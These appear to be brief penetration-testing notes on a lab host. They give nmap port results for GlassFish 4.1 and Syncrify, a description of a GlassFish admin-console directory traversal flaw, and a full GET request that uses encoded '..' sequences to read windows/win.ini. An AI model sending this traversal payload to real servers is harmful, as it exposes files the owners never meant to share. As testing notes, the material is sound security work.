4848/tcp open http Sun GlassFish Open Source Edition 4.1
6060/tcp open http Synametrics Web Server 7 (Syncrify)
8080/tcp open http Sun GlassFish Open Source Edition 4.1
8181/tcp open ssl/http Sun GlassFish Open Source Edition 4.1
http://192.168.234.168:6060/app - Synametrics Web Server 7 (Syncrify)
The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated.
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini